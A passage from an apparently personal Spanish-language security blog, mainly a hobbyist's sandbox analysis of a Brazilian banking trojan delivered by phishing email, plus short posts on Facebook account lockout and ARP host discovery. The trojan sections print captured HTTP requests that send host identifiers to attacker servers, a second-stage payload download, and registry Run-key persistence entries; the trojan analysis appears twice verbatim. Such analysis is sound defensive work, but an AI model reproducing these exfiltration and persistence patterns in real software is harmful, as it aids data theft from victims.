from=%5B%2B1%5D+INFECT+%3D%29&FromMail=infects%40rbd%2Ecom&destino=fcorp2009%40gmail%2Ecom&assunto=%5B%2B1+Infect%5D%3A+JUAN%2DAA57CF7254+Vem+q+vem+INFECTs%21+%3A%29&mensagem=Computer+Name%3A+JUAN%2DAA57CF7254%0DStatus+GBPLUGIN%3A+Plugin+de+Seguran%E7a+n%E3o+Instalado%2E%0DDate%3A+15%2F07%2F2010+%2D+Atual%0DTime%3A+00%3A14%3A52+%2D+Atual%0DIP%3A+201%2E253%2E149%2E60%0DMAC+ADR%3A+00%2D0C%2D29%2DD5%2DC0%2D72%0DLocaliza%E7%E3o%3A+Espa%F1a%0D%5Bx%5D+Url%27s+Visitadas+%5Bx%5D%0D%0A%0D%0Ahttp%3A%2F%2Fchat%2Earnet%2Ecom%2Ear%2F%0D%0A%5C%5C10%2E0%2E0%2E2%5CC%0D%0Ahttp%3A%2F%2Fwww%2Emegaupload%2Ecom%2F%0D%0Ahttp%3A%2F%2Fwww%2Eamericaenvivo%2Ecom%2Ear%2F%0D%0A&
URLDECODED:
from=[+1] INFECT =)&FromMail=infects@rbd.com&destino=fcorp2009@gmail.com&assunto=[+1 Infect]: JUAN-AA57CF7254 Vem q vem INFECTs! :)&mensagem=Computer Name: JUAN-AA57CF7254 Status GBPLUGIN: Plugin de Segurança não Instalado. Date: 15/07/2010 - Atual Time: 00:14:52 - Atual IP: 201.253.149.XX MAC ADR: 00-0C-29-D5-C0-72 Localização: España [x] Url's Visitadas [x] http://chat.arnet.com.ar/ \\10.0.0.2\C http://www.megaupload.com/ http://www.americaenvivo.com.ar/ &
JA!, mirá que bien, saben que a veces paseo por el chat de arnet, bajo contenido GPL de megaupload y miro américa xD. Además de mi IP, máscara de red y mi hermoso nombre xD. También dice (según mi PRECARIO portugues) que el plugin de seguridad a sido instalado mmm... y que soy de españa, algo obvio... joder!
Aparentemente son datos para enviar por email, por las direcciones de origen y destino involucradas...
HOLA, ahora estoy oficialmente infectado xD.
Lo gracioso, es que http://201.2.106.69/ajax/indx. php, si, nótese inDX, sin E, no existe en el servidor (o responde con 404 a modo de despistar...), si en cambio existe index.php (que da un error al conectarse al servidor mysql aparentemente).
En fin... son muchos los bancos que se encuentran representados por las imágenes que se descargan, evidentemente destinadas a phishing...
También aparece un tercero dominio involucrado..., hum.au.dk, otro sitio de dinamarca posiblemente comprometido, ya que aparentemente se trata de una organización de bien xD. También el dominio http://cluster003.ovh.net/, aparentemente un servidor de mail "multipropósito", voy a ver mas sobre este, parece interesante.
Bueno, para permanecer atento, el bichito registra un par de claves en el registro de windows (el viejo truco xD):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctmon2"="C:\\Arquivos de programas\\Sidebar\\new.exe"
"ctmon32"="C:\\Arquivos de programas\\Sidebar\\java32.exe"
[HKEY_USERS\S-1-5-21-527237240-1958367476-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Run]
"msnmsr"="C:\\Arquivos de programas\\Sidebar\\new.exe"
"ctmon32"="C:\\Arquivos de programas\\Sidebar\\java32.exe"
[HKEY_USERS\S-1-5-21-527237240-1958367476-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Run]
"msnmsr"="C:\\Arquivos de programas\\Sidebar\\new.exe"
"ctmon32"="C:\\Arquivos de programas\\Sidebar\\java32.exe"
y ahora?
Suponiendo que este sea el único método de supervivencia que utiliza, su eliminación es simple, basta con buscarlo en el registro y eliminar todas las claves de ese tipo, remover por completo el directorio "Arquivos de programas" (salvo que tengas el sistema operativo en portugues jajajaja), y eliminar todo el contenido temporal de internet (y pasar el antivirus xD, si es que todavía funciona).
Se extendió demasiado esto jaja, solo espero que alguien lo lea y comente al respecto. Me gustaría poder hacer un análisis un poco mas forense del tema pero ni el conocimiento ni el tiempo me lo permiten, al menos por ahora.
No puse muchos nombres de dominio, IPs e imágenes porque... bueno, no quiero romperle las bolas a nadie, solamente mostrar lo que está pasando.
Está claro que el phishing está en su pico mas alto de productividad... no noté cambio alguno en mis browsers FF 3.5.10 e IE 6.0, pero posiblemente un análisis mas detallado de los archivos descargados sea interesante, después de todo uno de los datos enviados por el bichito es una confirmacion de actualización/infección...
En fin, aca corto, cualquier comentario es bien venido :P.
viernes, 9 de julio de 2010
Los chicos de brazil y sus troyanos (botnet?)
Hoy a la siesta mientras esperabamos a Nicolás, Fernando desarmaba una xbox y yo... leía un poco de DB2 me llegó un mail de un contacto del messenger que jamás me escribiría un mail xD. Cuando leo el mail, claramente no era del remitente que acusaba ser, (incluso hotmail lo detectó como posible falsificación) ya que venía escrito en portugues :P y dice:
Desculpa, por nao ter enviado logo, mas ai esta o album para visualizar ta ....
CLIQUE PARA VISUALIZAR
-0.36152
Que si mi pésimo portugues de secundario no se equivoca significa: "Perdona por no haberte enviado el logo, aqui está el album para ver...", gracioso. En fin..., viendo el link un poco dije... veamos que me trae este dulce mail xD: "http://correioss.info/visualizar . php?=fotosaniversario.html?0.36152", (notese los espacios en el punto" . ") el link nos pide descargar un hermoso ejecutable (visualizar.exe).
http://correioss.info ... "It works!" para el que alguna vez instaló apache en un debian (por ejemplo), este es el mensaje por defecto de una instalación exitosa :D. Los chicos instalaron apache para jugar... Y como jugar es divertido empecé a buscar directorios interesantes en el servidor, vean http://correioss.info/php/ :
Un login :P, los chicos tienen un login para jugar!!! bien... probando un nombre cualquiera a ver si me dejan jugar a mi también :D:
Apaaaaa!!! parece que juan no está invitado a la fiesta de don "S1turn0" y no tengo ningún infectado :P. Al parecer los chicos perdieron un archivo relatorio.html.
El sitio está dividido en 3 frames, el superior es cont.php, el del medio es relatorio.html y el de abajo rdp.php.
logout es un enlace a un lugar llamado: http://www.site.com.br/contador/ que no es mas que una imagen de un 0 (en este caso), www.site.com.br es el sitio de un hosting de brazil...
Como me fui quedando sin ideas decidí ver que pretendía de mi la invitación (visualizar.exe), a diferencia de los archivos "analizados" anteriormete este es mas divertido :P.
Entonces ejecuté el archivito en cuestión en un entorno un tanto aislado (windows XP SP3 + SandBoxie + con conexión a internet).
Lo que sucedio fue:
1-Pidio una resolución de nombres para el dominio correioss.info y con la ip devuelta hiso lo siguiente:
/*PETICION*/
POST /php/contador.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
Host: correioss.info
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
computador=JUAN%2DAA57CF7254&usuario=Administrador&shd_fisico=00EE2004&shd_firmware=0485F93D&mac=00%2D0C%2D29%2D6C%2DC1%2D1A&windir=&pag_inic=http%3A%2F%2Fla%2F&
/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:42:28 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4.5
Content-Length: 236
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Warning: fopen(08-Jul-2010 23-42-29.html) [function.fopen]: failed to open stream: Permission denied in /var/www/php/contador.php on line 15
Nao pude abrir o seu arquivo...
Divertido como se hicieron con mi nombre de usuario, dirección mac, etc... JA! estos chicos molestos. Pero al parecer no pudieron registrar mucho porque falló la operación fopen por permisos denegados xD.
2-No les alcanzó con cargarse mis datos, vinieron por mas... ahora el bichito intenta acceder a una suerte de login con:
/*PETICION*/
GET /php/acesso.php HTTP/1.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Host: correioss.info
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:42:29 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4.5
Content-Length: 934
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Warning: fopen(acessos.txt) [function.fopen]: failed to open stream: Permission denied in /var/www/php/acesso.php on line 3
Warning: fread(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 4
Warning: fclose(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 5
Warning: fopen(acessos.txt) [function.fopen]: failed to open stream: Permission denied in /var/www/php/acesso.php on line 7
Warning: fputs(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 8
Warning: fclose(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 9
Pero siguen sin poder escribir en el archivo acessos.txt :(, que de hecho tiene un 0 guardado xD.
3-Y bueno... (pensé que no daba para mas...) ahora se le ocurrió descargar otro bichito mas oO...
/*PETICION*/
GET /nero1.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: correioss.info
Connection: Keep-Alive
/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:42:32 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Wed, 07 Jul 2010 14:49:37 GMT
ETag: "7f98680-233600-48acd475c4240"
Accept-Ranges: bytes
Content-Length: 2307584
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
Como se imaginaran en esta respuesta llegó una buena cantidad de bytes correspondientes al archivo "nero1.exe" que acaba de descargarse.
El ultimo mensaje http es el siguiente:
NTkrnl Secure Suite
Version 0.1
Metamorphism Portable Executable (PE) Packer and Protector Library
Copyright . 2006-2007 Ashkbiz Danehkar
All Rights Reserved
Homepage: http://www.ntkrnl.com
E-mail: info@ntkrnl.com NTkrnl Geborgene Zeug
Version 0.1
Metamorphismus Portable Executable (PE) Packer und Besch.tzer Bibliothek
Urheberrechtlicher . 2006-2007 Ashkbiz Danehkar
Alle Rechten reservierten
HauseSeite: http://www.ntkrnl.com
E-Mail: info@ntkrnl.com NTkrnl Sicuro Seguito
Version 0.1
Metamorphism Portable Eseguibile (PE) Biblioteca del Imballatore e del Protettore
Propriet. letterario riservato . 2006-2007 Ashkbiz Danehkar
Casa pagina: http://www.ntkrnl.com
E-mail: info@ntkrnl.com
JA!, el sitio está fuera, pero básicamente consiste en una suerte de protector de código (para que la gente que sabe de estas cosas no pueda descubrir el real funcionamiento del bichito).
Pero no termina aca :P, re denso son los tipitos estos jaja.
4-Al parecer como todo iba mal en el dominio .info los chicos levantaron otro server en el dominio .net :P, el bichito pidio una resolución de nombres para www.correioss.net (ambas ips muy similares...). Una vez obtenida la ip conversaron un poco:
/*PETICION*/
POST /enter.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Host: www.correioss.net
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
tipo=cli&cli=JUAN%2DAA57CF7254&
/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:43:57 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4
Content-Length: 2
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
OK
ok? qué??? eso es todo? en la peticion se aclaran dos cosas un tipo=cli (cliente ?) y el nombre del cliente :P, yo!.
5-JA!, mirá lo que hacen los nenessssss!!!
/*PETICION*/
POST /atualizado/update.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Host: correioss.net
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
praquem=wwwcaix%40gmail%2Ecom&titulo=JUAN%2DAA57CF7254+007&texto=%2E%2E%2E%2E%2Eby%2Ecyrus%2E%23%40%2E%2E%2E%2E%2E%0D%0AAtualizada+para%3A+007%0D%0A&
/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:43:58 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Que tiernosss ¬¬, ahora están poniendose al día :P, /atualizado/update.php contiene la siguiente info:
praquem=wwwcaix@gmail.com&titulo=JUAN-AA57CF7254 007&texto=.....by.cyrus.#@..... Atualizada para: 007 &
Osea que ahora wwwcaix@gmail.com recibe un mail con mis datos :P, "hola caix soy juan ¬¬" y cyrus no pudo contenerse e incluirse en el contenido del mail :P.
6-Luego algo extraño que no voy a incluir hasta no estar seguro.
7-Otra resolución de nombres :D, esta vez por www.itau.com.br
/*PETICION*/
GET / HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.itau.com.br
Connection: Keep-Alive
/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:41:23 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 14 May 2010 22:16:22 GMT
ETag: "265e-16c7-39a1d980"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1410
Keep-Alive: timeout=5, max=500000
Connection: Keep-Alive
Content-Type: text/html
Esta parte realmente me dio cagaso... itaú es un banco brasilero... Aparentemente en este punto no fue mas que un get al sitio del banco... o al menos eso parece... voy a ver un poco mas sobre este punto cuando tenga tiempo.
8-Otra resolución, esta vez por updater.hd1.com.br y buscando lo siguiente:
/*PETICION*/
GET /versaoatual.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: updater.hd1.com.br
Connection: Keep-Alive
/*RESPUESTA*/
HTTP/1.1 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-803475731"
Last-Modified: Wed, 07 Jul 2010 15:52:35 GMT
Content-Length: 3
Date: Fri, 09 Jul 2010 04:42:03 GMT
Server: lighttpd/1.4.19
007
/*PETICION*/
GET /downloadkey.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: updater.hd1.com.br
Connection: Keep-Alive
/*RESPUESTA*/
HTTP/1.1 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "129092051"
Last-Modified: Sun, 04 Jul 2010 06:36:48 GMT
Content-Length: 31
Date: Fri, 09 Jul 2010 04:42:03 GMT
Server: lighttpd/1.4.19
http://correioss.info/nero1.exe
Se acaban de descargar dos archivos... versaoatual.txt y downloadkey.txt... con información poco relevante a esta altura versaoatual.txt=007 y downloadkey.txt=http://correioss.info/nero1.exe. 007 número apropiado cierto? :P.
Habría que escribir a nuestro amigo wwwcraix un mail???
Desculpa, por nao ter enviado logo, mas ai esta o album para visualizar ta ....
CLIQUE PARA VISUALIZAR
-0.36152
Que si mi pésimo portugues de secundario no se equivoca significa: "Perdona por no haberte enviado el logo, aqui está el album para ver...", gracioso. En fin..., viendo el link un poco dije... veamos que me trae este dulce mail xD: "http://correioss.info/visualizar . php?=fotosaniversario.html?0.36152", (notese los espacios en el punto" . ") el link nos pide descargar un hermoso ejecutable (visualizar.exe).
http://correioss.info ... "It works!" para el que alguna vez instaló apache en un debian (por ejemplo), este es el mensaje por defecto de una instalación exitosa :D. Los chicos instalaron apache para jugar... Y como jugar es divertido empecé a buscar directorios interesantes en el servidor, vean http://correioss.info/php/ :
Un login :P, los chicos tienen un login para jugar!!! bien... probando un nombre cualquiera a ver si me dejan jugar a mi también :D:
Apaaaaa!!! parece que juan no está invitado a la fiesta de don "S1turn0" y no tengo ningún infectado :P. Al parecer los chicos perdieron un archivo relatorio.html.
El sitio está dividido en 3 frames, el superior es cont.php, el del medio es relatorio.html y el de abajo rdp.php.
logout es un enlace a un lugar llamado: http://www.site.com.br/contador/ que no es mas que una imagen de un 0 (en este caso), www.site.com.br es el sitio de un hosting de brazil...
Como me fui quedando sin ideas decidí ver que pretendía de mi la invitación (visualizar.exe), a diferencia de los archivos "analizados" anteriormete este es mas divertido :P.
Entonces ejecuté el archivito en cuestión en un entorno un tanto aislado (windows XP SP3 + SandBoxie + con conexión a internet).
Lo que sucedio fue:
1-Pidio una resolución de nombres para el dominio correioss.info y con la ip devuelta hiso lo siguiente:
/*PETICION*/
POST /php/contador.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
Host: correioss.info
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
computador=JUAN%2DAA57CF7254&usuario=Administrador&shd_fisico=00EE2004&shd_firmware=0485F93D&mac=00%2D0C%2D29%2D6C%2DC1%2D1A&windir=&pag_inic=http%3A%2F%2Fla%2F&
/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:42:28 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4.5
Content-Length: 236
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Warning: fopen(08-Jul-2010 23-42-29.html) [function.fopen]: failed to open stream: Permission denied in /var/www/php/contador.php on line 15
Nao pude abrir o seu arquivo...
Divertido como se hicieron con mi nombre de usuario, dirección mac, etc... JA! estos chicos molestos. Pero al parecer no pudieron registrar mucho porque falló la operación fopen por permisos denegados xD.
2-No les alcanzó con cargarse mis datos, vinieron por mas... ahora el bichito intenta acceder a una suerte de login con:
/*PETICION*/
GET /php/acesso.php HTTP/1.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Host: correioss.info
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:42:29 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4.5
Content-Length: 934
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Warning: fopen(acessos.txt) [function.fopen]: failed to open stream: Permission denied in /var/www/php/acesso.php on line 3
Warning: fread(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 4
Warning: fclose(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 5
Warning: fopen(acessos.txt) [function.fopen]: failed to open stream: Permission denied in /var/www/php/acesso.php on line 7
Warning: fputs(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 8
Warning: fclose(): supplied argument is not a valid stream resource in /var/www/php/acesso.php on line 9
Pero siguen sin poder escribir en el archivo acessos.txt :(, que de hecho tiene un 0 guardado xD.
3-Y bueno... (pensé que no daba para mas...) ahora se le ocurrió descargar otro bichito mas oO...
/*PETICION*/
GET /nero1.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: correioss.info
Connection: Keep-Alive
/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:42:32 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Wed, 07 Jul 2010 14:49:37 GMT
ETag: "7f98680-233600-48acd475c4240"
Accept-Ranges: bytes
Content-Length: 2307584
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
Como se imaginaran en esta respuesta llegó una buena cantidad de bytes correspondientes al archivo "nero1.exe" que acaba de descargarse.
El ultimo mensaje http es el siguiente:
NTkrnl Secure Suite
Version 0.1
Metamorphism Portable Executable (PE) Packer and Protector Library
Copyright . 2006-2007 Ashkbiz Danehkar
All Rights Reserved
Homepage: http://www.ntkrnl.com
E-mail: info@ntkrnl.com NTkrnl Geborgene Zeug
Version 0.1
Metamorphismus Portable Executable (PE) Packer und Besch.tzer Bibliothek
Urheberrechtlicher . 2006-2007 Ashkbiz Danehkar
Alle Rechten reservierten
HauseSeite: http://www.ntkrnl.com
E-Mail: info@ntkrnl.com NTkrnl Sicuro Seguito
Version 0.1
Metamorphism Portable Eseguibile (PE) Biblioteca del Imballatore e del Protettore
Propriet. letterario riservato . 2006-2007 Ashkbiz Danehkar
Casa pagina: http://www.ntkrnl.com
E-mail: info@ntkrnl.com
JA!, el sitio está fuera, pero básicamente consiste en una suerte de protector de código (para que la gente que sabe de estas cosas no pueda descubrir el real funcionamiento del bichito).
Pero no termina aca :P, re denso son los tipitos estos jaja.
4-Al parecer como todo iba mal en el dominio .info los chicos levantaron otro server en el dominio .net :P, el bichito pidio una resolución de nombres para www.correioss.net (ambas ips muy similares...). Una vez obtenida la ip conversaron un poco:
/*PETICION*/
POST /enter.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Host: www.correioss.net
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
tipo=cli&cli=JUAN%2DAA57CF7254&
/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:43:57 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4
Content-Length: 2
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
OK
ok? qué??? eso es todo? en la peticion se aclaran dos cosas un tipo=cli (cliente ?) y el nombre del cliente :P, yo!.
5-JA!, mirá lo que hacen los nenessssss!!!
/*PETICION*/
POST /atualizado/update.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Host: correioss.net
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
praquem=wwwcaix%40gmail%2Ecom&titulo=JUAN%2DAA57CF7254+007&texto=%2E%2E%2E%2E%2Eby%2Ecyrus%2E%23%40%2E%2E%2E%2E%2E%0D%0AAtualizada+para%3A+007%0D%0A&
/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:43:58 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-3ubuntu4
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Que tiernosss ¬¬, ahora están poniendose al día :P, /atualizado/update.php contiene la siguiente info:
praquem=wwwcaix@gmail.com&titulo=JUAN-AA57CF7254 007&texto=.....by.cyrus.#@..... Atualizada para: 007 &
Osea que ahora wwwcaix@gmail.com recibe un mail con mis datos :P, "hola caix soy juan ¬¬" y cyrus no pudo contenerse e incluirse en el contenido del mail :P.
6-Luego algo extraño que no voy a incluir hasta no estar seguro.
7-Otra resolución de nombres :D, esta vez por www.itau.com.br
/*PETICION*/
GET / HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.itau.com.br
Connection: Keep-Alive
/*RESPUESTA*/
HTTP/1.1 200 OK
Date: Fri, 09 Jul 2010 03:41:23 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 14 May 2010 22:16:22 GMT
ETag: "265e-16c7-39a1d980"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1410
Keep-Alive: timeout=5, max=500000
Connection: Keep-Alive
Content-Type: text/html
Esta parte realmente me dio cagaso... itaú es un banco brasilero... Aparentemente en este punto no fue mas que un get al sitio del banco... o al menos eso parece... voy a ver un poco mas sobre este punto cuando tenga tiempo.
8-Otra resolución, esta vez por updater.hd1.com.br y buscando lo siguiente:
/*PETICION*/
GET /versaoatual.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: updater.hd1.com.br
Connection: Keep-Alive
/*RESPUESTA*/
HTTP/1.1 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-803475731"
Last-Modified: Wed, 07 Jul 2010 15:52:35 GMT
Content-Length: 3
Date: Fri, 09 Jul 2010 04:42:03 GMT
Server: lighttpd/1.4.19
007
/*PETICION*/
GET /downloadkey.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: updater.hd1.com.br
Connection: Keep-Alive
/*RESPUESTA*/
HTTP/1.1 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "129092051"
Last-Modified: Sun, 04 Jul 2010 06:36:48 GMT
Content-Length: 31
Date: Fri, 09 Jul 2010 04:42:03 GMT
Server: lighttpd/1.4.19
http://correioss.info/nero1.exe
Se acaban de descargar dos archivos... versaoatual.txt y downloadkey.txt... con información poco relevante a esta altura versaoatual.txt=007 y downloadkey.txt=http://correioss.info/nero1.exe. 007 número apropiado cierto? :P.
Habría que escribir a nuestro amigo wwwcraix un mail???
martes, 6 de julio de 2010
Jugando con el login the facebook
buenassss, un post cortito y divertido, jugando un poco antes de empezar a estudiar acabo de bloquear mi cuenta de facebook por exceso de intentos fallidos. Obtuve la siguiente imagen :D :
Lo divertido en todo esto es que luego de muchos intentos fallidos la cuenta queda bloqueada y exige un cambio de contraseña (algo razonable???). No permite iniciar sesión... de ninguna manera aparentemente.
Otro punto divertido es que ya cambié la contraseña 2 veces y sigo recibiendo el mismo mensaje :D, por lo tanto hasta ahora cabe la idea de que el bloqueo de la cuenta sea temporal... esto podría considerarse un ataque de denegación de servicio??? mmm, si acceder a mi cuenta fuese de vital importancia y alguien se encarga de que no pueda acceder... interesante :P, a charlar con los chicos de facebook.
Me olvidé de contar la cantidad de accesos fallidos, ese es el próximo paso :D.
Update I:
Límite de solicitud de contraseñas alcanzado... sigo sin poder acceder a la cuenta.
Un epic FAIL gracioso: solicitud "eSXpirada"
Lo divertido en todo esto es que luego de muchos intentos fallidos la cuenta queda bloqueada y exige un cambio de contraseña (algo razonable???). No permite iniciar sesión... de ninguna manera aparentemente.
Otro punto divertido es que ya cambié la contraseña 2 veces y sigo recibiendo el mismo mensaje :D, por lo tanto hasta ahora cabe la idea de que el bloqueo de la cuenta sea temporal... esto podría considerarse un ataque de denegación de servicio??? mmm, si acceder a mi cuenta fuese de vital importancia y alguien se encarga de que no pueda acceder... interesante :P, a charlar con los chicos de facebook.
Me olvidé de contar la cantidad de accesos fallidos, ese es el próximo paso :D.
Update I:
Límite de solicitud de contraseñas alcanzado... sigo sin poder acceder a la cuenta.
Un epic FAIL gracioso: solicitud "eSXpirada"
domingo, 2 de mayo de 2010
Cuántos somos en esta red???
mmm un poco falto inspiración últimamente, terminando los parciales (o no, no estoy muy seguro xD). Hoy me entró la necesidad de poder saber al "instante" la totalidad de hosts conectados a una LAN, (que necesidades las mías xD).
Lo primero que me vino a la mente fue hacer un ping a cada host de la red, pero cabe la posibilidad de que los hosts no respondan las ECHO-Request ICMP, entonces me estaría perdiendo alguno que otro. Entonces lo mas recomendable me pareció ser utilizar ARP (Address Resolution Protocol), protocolo esencial en las redes LAN para traducir las direcciones de red (IP en este caso) a direcciones de capa de enlace (Ethernet MAC address en este caso).
Cabe aclarar que las comunicaciones entre hosts que pertenecen a un mismo segmento LAN se realiza mediante direcciones MAC, las direcciones IP realmente se utilizan cuando los hosts se encuentran en diferentes redes.
Volviendo al tema... buscando alguna aplicación que sea útil para esta tarea me encontré inicialmente con "arping" (parte del paquete iputils), que justamente nos permite crear paquetes ARP.
Primero aproximación con arping:
Podemos ver que el host 192.168.0.1 está activo y respondió a la primer consulta, entonces no fue necesario enviar mas. "-f deja de enviar ni bien recibe una respuesta" "-c 2 máximo de consultas".
root@moon:/home/juan# arping -f -c 2 -I eth0 192.168.0.1
ARPING 192.168.0.1 from 192.168.0.36 eth0
Unicast reply from 192.168.0.1 [00:08:54:29:06:__] 0.876ms
Sent 1 probes (1 broadcast(s))
Received 1 response(s)
Definitivamente esto no es lo que queria, tener que repetir el comando mas de 200 veces para recorrer todo la red C no está en mis planes, si bien podría hacerse con un script, no me interesa.
